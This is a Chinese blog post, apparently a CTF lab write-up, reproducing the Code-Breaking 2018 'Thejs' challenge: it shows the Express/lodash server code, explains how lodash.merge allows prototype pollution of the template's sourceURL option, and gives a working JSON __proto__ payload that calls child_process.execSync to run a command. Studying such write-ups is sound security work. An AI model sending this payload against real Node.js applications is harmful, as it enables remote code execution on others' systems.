原型链污染

最新推荐文章于 2024-07-20 14:28:29 发布
最新推荐文章于 2024-07-20 14:28:29 发布
阅读量58 收藏
点赞数
文章标签: 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62389190/article/details/132123698
版权

原型链污染例题实现

Code-Breaking 2018 Thejs 分析

下载配置环境,我这里是在本地进行环境配置

https://github.com/docker/compose/releases

https://github.com/phith0n/code-breaking/tree/master

下载内容如下

将其放在nodejs下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ETnueQvl-1691235128300)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805155705526.png)]

然后更改views目录下的index.ejs文件,改为本地的ip地址,用于加载前端页面

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h9f9Q3Cc-1691235128301)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805155833355.png)]

然后启动server.js文件进行监听

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FzWEcyu0-1691235128301)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805155923472.png)]

之后使用浏览器通过IP地址和端口进行访问

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GFA48FFi-1691235128302)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805160010355.png)]

可以进行功能测试[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s0tluGQi-1691235128302)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805160214202.png)]

后端代码分析

主要代码如下
const fs = require('fs')

const express = require('express')

const bodyParser = require('body-parser')

const lodash = require('lodash')

const session = require('express-session')

const randomize = require('randomatic')



const app = express()

app.use(bodyParser.urlencoded({extended: true})).use(bodyParser.json())

app.use('/static', express.static('static'))

app.use(session({

  name: 'thejs.session',

  secret: randomize('aA0', 16),

  resave: false,

  saveUninitialized: false

}))

app.engine('ejs', function (filePath, options, callback) { // define the template engine

  fs.readFile(filePath, (err, content) => {

    if (err) return callback(new Error(err))

   let compiled = lodash.template(content)

   let rendered = compiled({...options})

    return callback(null, rendered)

  })

})

app.set('views', './views')

app.set('view engine', 'ejs')


app.all('/', (req, res) => {

  let data = req.session.data || {language: [], category: []}

  if (req.method == 'POST') {

    data = lodash.merge(data, req.body)
    req.session.data = data

  }


  res.render('index', {

    language: data.language, 

    category: data.category

  })

})


app.listen(3000, () => console.log(`Example app listening on port 3000!`))

lodash是为了弥补JavaScript原生函数功能不足而提供的一个辅助功能集,其中包含字符串、数组、对象等操作。这个Web应用中,使用了lodash提供的两个工具:

  1. lodash.template 一个简单的模板引擎
  2. lodash.merge 函数或对象的合并

以上代码简单逻辑就是用户提交的信息,用merge方法合并到session里,多次提交,session里最终保存你提交的所有信息。在上述的功能测试那一块有体现。

而这里的lodash.merge操作实际上就存在原型链污染漏洞。

在污染原型链后,我们相当于可以给Object对象插入任意属性,这个插入的属性反应在最后的lodash.template中。我们看到lodash.template的代码:https://github.com/lodash/lodash/blob/4.17.4-npm/template.js#L165

// Use a sourceURL for easier debugging.
sourceURL 空
var sourceURL = 'sourceURL' in options ? '//# sourceURL=' + options.sourceURL + '\n' : '';
var result = attempt(function() {
  return Function(importsKeys, sourceURL + 'return ' + source)
  .apply(undefined, importsValues);
});

options是一个对象,sourceURL取到了其options.sourceURL属性。这个属性原本是没有赋值的,默认取空字符串。

思路就是通过merge函数的漏洞,对sourceURl进行原型污染,达到任意命令执行的目的

所以这里给Object对象中都插入一个sourceURL属性。最后,这个sourceURL被拼接进new Function的第二个参数中,造成任意代码执行漏洞。

将带有__proto__的Payload以json的形式发送给后端,因为express框架支持根据Content-Type来解析请求Body,这里给我们注入原型提供了很大方便

使用BP进行抓包

开启浏览器代理

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B3Z4IXZ1-1691235128303)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805164046703.png)]

进行抓包

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nyAsRHLW-1691235128303)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805164024320.png)]

然后将Content-Type: application/x-www-form-urlencode改为Content-Type: application/jso格式

之后进行重放发送

{"__proto__": {"sourceURL": "\u000areturn ()=>{for (var a in {}) {delete Object.prototype[a];} return global.process.mainModule.constructor._load('child_process').execSync('ipconfig')}\u000a//"}}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-R97TJ2IZ-1691235128303)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805170645235.png)]

发现已经成功执行了ipconfig命令获取了本地的网卡信息。也可以执行任意命令。

醉了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
原型链污染漏洞+前后端实战案例
08-04
原型链污染漏洞是一种安全问题,它允许攻击者通过篡改或注入代码来操纵对象的原型,从而可能导致数据泄漏、逻辑错误甚至完全控制应用程序。本文将深入探讨原型链污染的概念、其产生的原因以及在前端和后端开发中的...
JavaScript作用域、闭包、对象与原型链概念及用法实例总结
10-18
例如,使用闭包可以避免全局变量污染,利用原型链实现继承,理解作用域可以帮助管理变量生命周期,而正确处理`this`能确保代码逻辑的正确性。实践是检验理论的最好方式,通过编写实际的代码实例,你可以更好地理解并...
复现原型链污染
weixin_64623293的博客
08-07 206
是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法2.一个对象的__proto__属性,指向这个对象所在的类的prototype属性对于对象son,在调用。
nodejs——原型链污染
m0_73756016的博客
06-12 920
参考滑动验证页面。
JavaScript原型链污染攻击
BerL1n
07-18 7186
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js中你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
NodeJS原型链污染
Aiwin的博客
05-11 1061
NodeJS原型链污染
Python原型链污染
Elite的博客
07-23 1059
Python 中的原型链污染(Prototype Pollution)是指通过修改对象原型链中的属性,对程序的行为产生意外影响或利用漏洞进行攻击的一种技术。
js原型链污染
m0_73973498的博客
11-13 58
需要纠正的是,o2和o1对象的层级本身是没有__proto__属性的,只有__prototype__,我们平常通过.__proto__调用都是向上寻找到Object.prototype,调用其中的__proto__属性,因为__proto__属性通过Getter动态获取__proto__的值的,所以不同层级的对象调用Object.prototype中的__proto__属性得到的值是不同的。这是merge函数造成的原型链污染,类似的还有clone函数,本质是找到能够控制数组(对象)的“键名”的操作。
nodejs——ejs模版遇到原型链污染产生rce
m0_73756016的博客
06-19 291
EJS是一个javascript模板库,用来从json数据中生成HTML字符串功能:缓存功能,能够缓存好的HTML模板;<% code %>用来执行javascript代码安装:看了一圈这个写的最详细Express+lodash+ejs: 从原型链污染到RCE懂了个大概吧就是还有这篇文章从 Lodash 原型链污染到模板 RCE-安全客 - 安全资讯平台大概意思就是说ejs在渲染的时候有大量代码拼接然后我们通过原型链污染达到变量覆盖就可以构造注入先闭合上面的语句再构造rce的语句。
nodejs原型链污染
yink12138的博客
01-10 3320
nodejs原型链污染
渗透攻击方法:原型链污染
txtxla的博客
08-05 870
在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险.
【技术分享】从浅入深 Javascript 原型链原型链污染 .pdf
09-05
本文将深入探讨JavaScript原型链的工作原理及其可能导致的安全问题——原型链污染。 首先,JavaScript 中的对象继承并不像传统面向对象语言那样基于类,而是通过原型链机制。每个对象都有一个内部属性`[[Prototype]...
comp4901o-presentation:COMP 4901O演示文稿-JavaScript原型污染
03-22
原型污染通常发生在以下情况:当开发者使用不安全的代码(例如,没有充分验证用户输入)来设置对象属性时,攻击者可以利用这个机会将恶意数据注入到原型链中。例如,如果一个函数尝试将用户输入作为对象属性添加到...
SpringBoot整合SSE,实现后端主动推送DEMO
zjy660358的专栏
07-17 346
说起服务端主动推送,大家第一个想到的一定是WEBSOCKET。作为软件工程师,不能无脑使用一种技术,要结合实际情况,择优选取。SSE(Server-Sent Events)相比于WEBSOCKET1、轻量化、兼容性 基于传统的HTTP协议,所以浏览器兼容性比较好2、 只支持单向通讯。(服务器->客户端)
全局 loading
paopao_pop的博客
07-17 331
做项目中一直想用一个统一的 loading 状态控制全部的接口加载,但是一直不知道怎么处理,最近脑子突然灵光了一下想到了一个办法。估计大佬也看出来了,虽然是个方法,但是很不严谨。因为简单的计数法,会有出现负数的情况,甚至两个接口同时响应的情况(当然这种很极端)然后因为页面会有很多接口会同时触发接口调用,但是接口响应时间是不一定的,所以采用计数法处理,代码如下。我询问了后端大佬,给我提供了一种互斥锁的概念可以融入其中,所以出现了现在的最好版本。今天就这样,又是小白学习的一天,加油!
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 292
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
好用的接口文档swagger
最新发布
qq_62791684的博客
07-20 266
本篇文章记录怎么给我们的后端项目整一个好用的接口文档swagger
前端下载文件流 出现乱码 解决方案
weixin_46448762的博客
07-18 386
2. 若添加 utf-8 后依旧乱码 请求配置中添加 responseType: 'arraybuffer',1. 后端返回文件格式不是 utf-8。
ctfshow 原型链污染
10-14
好的,你的问题是关于原型链污染的。原型链污染是一种攻击方式,通过修改目标对象的原型链来实现攻击目的。攻击者可以通过修改原型链来篡改对象的属性或方法,从而达到攻击的目的。 例如,攻击者可以通过修改Object...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值